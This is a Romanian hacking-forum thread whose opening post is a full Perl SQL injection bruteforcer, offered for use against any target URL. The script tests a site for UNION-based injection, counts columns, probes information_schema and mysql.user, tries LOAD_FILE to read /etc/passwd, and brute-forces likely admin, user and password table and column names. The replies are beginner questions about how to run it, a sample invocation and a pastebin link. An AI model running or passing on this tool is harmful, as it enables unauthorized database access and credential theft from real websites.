Jump to content
ZeroCold

SQL Injection bruteforcer

Recommended Posts

Posted

sqliblind.png

#!/usr/bin/perluse LWP::Simple;
if(!$ARGV[2])
{
print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";
print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
exit (0);
}
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
if ( $ARGV[0] !~ /^http:/ )
{
$ARGV[0] = "http://" . $ARGV[0];
}
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
{
$cmn.= "+";
$cfin.="--";
print "\n[+] Comments to use: '--' & '+'";
}
else
{
$cmn.= "/**/";
$cfin.= "/*";
print "\n[+] Comments to use: '/*' & '/**/'";
}
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
{
print "\n[!] Skipping the initial check...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "\n[!] Checking if the website is vulnerable...\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
$response=get($sql)or die("[-] Wrong Website, check it\n");
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/)
{
print "[+] Vulnerable website, script continues...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
exit(1);
}
}
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
print WEB "\n[COLUMNS]:\n\n";
$inyection = '';
$union = '';
}
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
if($response =~ /loginpwnz/)
{
$column ++;
print "[+] The site has $column columns\n\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
print "$sql\n";
print WEB "$sql\n";
print "\n[!] Checking if Information_Schema exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Information_Schema available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
}
else
{
print "\n[-] Information_Schema unavailable";
}
print "\n[!] Checking if MySQL.User exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
print "\n[+] MySQL.User available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
}
else
{
print "\n[-] MySQL.User unavailable";
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
print "\n[!] Checking if it is possible to inject LOAD_FILE...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
if($response =~ /root:x:/)
{
print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
}
else
{
print "\n[-] LOAD_FILE unavailable";
}
if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
{
print "\n\n[!] Brute forcing tables...";
print WEB "\n\n[TABLES]:\n\n";
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Table $tabla exists...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
print WEB "$sql\n";
}
}
}
if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
{
print "\n\n[!] Table to brute force columns: ";
$tabla.='';
chomp($tabla);
print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
print "\n[+] Column $columna available...saving in $ARGV[2]";
print WEB "$columna\n";
}
}
}
print WEB "\n\n\n[*EOF*]";
print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
print "## c0ded by Bl4k3 | 2010 ##\n\n";
exit (0);
}
}
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";
exit (0);

Posted

m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

Posted
m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

Nu pot sa fac o prezentare a fiecarui program pe care il postez, timp pierdut.

- SQL injection

- Brute Force Attack

Nu o sa iti explice nimeni nimic ca la clasa I, rar gasesti persoane care sa aiba rabdare cu tine si timp. Daca vrei sa inveti, inveti singur.

Guest Kovalski
Posted

este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care

[+] SQL Injection bruteforce By Bl4k3 -[+]-

=========================================

Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]

[WEBSITE]: Website Design | Small Business Web Design | Web.com

[COLUMNS]: Limit of columns to check

[FILE]: File where save the results

[COMMENT]: '/*' o '--' (Without '') (Optional)

[-T]: Try to brute force tables (Optional)

[-C]: Try to brute force columns (Optional)

[-NOCHECK]: Skip the initial check (Optional)

Posted
cunosc cei doi termeni,dar cum se foloseste codul?

Creezi un fi?ier .pl, ?i îl rulezi prin „perl script.pl”. Argumentele ?i le afi?eaz? el.

$ perl plm.pl hxxp://exemplu.ro/index.php?id= 20 res.txt -- -T -C

[+] Comments to use: '--' & '+'
[!] Checking if the website is vulnerable...
Undefined subroutine &main::get called at plm.pl line 61.

Linia 61 nu-mi zice nimic.

Posted
este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care

[+] SQL Injection bruteforce By Bl4k3 -[+]-

=========================================

Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]

[WEBSITE]: Website Design | Small Business Web Design | Web.com

[COLUMNS]: Limit of columns to check

[FILE]: File where save the results

[COMMENT]: '/*' o '--' (Without '') (Optional)

[-T]: Try to brute force tables (Optional)

[-C]: Try to brute force columns (Optional)

[-NOCHECK]: Skip the initial check (Optional)

am inteles totul...

Posted (edited)
cunosc cei doi termeni,dar cum se foloseste codul?

Mini-tutorial Perl/Tk

@ps-axl, imagineaza-ti ca scriptul de sus e primul script in perl pe care il vezi, e prima data cand auzi de perl.

Citeste ce ai scris tu:

este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care

(...)

Intelegi ceva?

Edited by ZeroCold
Posted
m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

As requested: [Perl] sqli_brute.pl - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...